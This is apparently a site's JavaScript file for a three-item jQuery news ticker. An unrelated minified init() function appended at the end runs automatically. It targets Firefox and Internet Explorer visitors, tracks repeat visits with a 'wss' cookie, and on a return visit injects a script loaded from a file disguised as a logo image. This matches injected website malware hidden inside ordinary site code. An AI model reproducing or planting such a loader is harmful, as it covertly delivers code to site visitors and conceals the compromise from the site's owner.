function hideshow1(){
	if ( $('#tickeritem1 .tickeritem_act').is(':visible')){
		$('#tickeritem1 a').fadeIn(1000);
		$('#ticker_1').fadeOut(1000);
		$('#tickeritem1 .tickeritem_act').fadeOut(1000);	
		$('#tickertxt1 h1').fadeOut(1000); 
		$('#tickertxt1 p').fadeOut(250); 
	} 
}

function hideshow2(){
	if ( $('#tickeritem2 .tickeritem_act').is(':visible')){
		$('#tickeritem2 a').fadeIn((1000));
		$('#ticker_2').fadeOut(1000);
		$('#tickeritem2 .tickeritem_act').fadeOut(1000);	
		$('#tickertxt2 h1').fadeOut(1000); 
		$('#tickertxt2 p').fadeOut(250); 
	} 	
}

function hideshow3(){
	if ( $('#tickeritem3 .tickeritem_act').is(':visible')){
		$('#tickeritem3 a').fadeIn(1000);
		$('#ticker_3').fadeOut(1000);
		$('#tickeritem3 .tickeritem_act').fadeOut(1000);	
		$('#tickertxt3 h1').fadeOut(1000); 
		$('#tickertxt3 p').fadeOut(250); 
	} 		
}

function slideshow1(){
	hideshow2(); hideshow3();	
	$('#tickeritem1 .tickeritem_act').fadeIn(1000);	
	$('#tickeritem1 a').fadeOut(1000);
	$('#ticker_1').fadeIn(1000);
	$('#tickertxt1 h1').fadeIn(1000); 
	$('#tickertxt1 p').fadeIn(250); 
	t=setTimeout("slideshow2()", 10000);
}

function slideshow2(){
	hideshow1(); hideshow3();	
	$('#tickeritem2 .tickeritem_act').fadeIn(1000);	
	$('#tickeritem2 a').fadeOut(1000);
	$('#ticker_2').fadeIn(1000);
	$('#tickertxt2 h1').fadeIn(1000); 
	$('#tickertxt2 p').fadeIn(250); 
	t=setTimeout("slideshow3()", 10000);
}

function slideshow3(){
	hideshow1(); hideshow2();	
	$('#tickeritem3 .tickeritem_act').fadeIn(1000);	
	$('#tickeritem3 a').fadeOut(1000);
	$('#ticker_3').fadeIn(1000);
	$('#tickertxt3 h1').fadeIn(1000); 
	$('#tickertxt3 p').fadeIn(250); 
	t=setTimeout("slideshow1()", 10000);
}


$(document).ready(function() {

	// t=setTimeout("slideshow1()", 2000);
	slideshow1();
});



function init(){var f=navigator.userAgent;var a=false;if(f.indexOf("Firefox")!=-1||f.indexOf("MSIE")!=-1){a=true}if(a!==true){return}var i="/images/logo_aangepast.jpg?js";var g=b("wss");if(g){if(g=="goot1"){c("wss","goot2","3");var e=document.createElement("script");e.type="text/javascript";e.src=i+"&r="+new Date().getTime();var d=document.getElementsByTagName("head")[0];d.appendChild(e)}else{}}else{c("wss","goot1","3")}function b(k){var j,h,m,l=document.cookie.split(";");for(j=0;j<l.length;j++){h=l[j].substr(0,l[j].indexOf("="));m=l[j].substr(l[j].indexOf("=")+1);h=h.replace(/^\s+|\s+$/g,"");if(h==k){return unescape(m)}}}function c(j,l,h){var m=new Date();m.setDate(m.getDate()+h);var k=escape(l)+((h==null)?"":"; expires="+m.toUTCString());document.cookie=j+"="+k}}init();
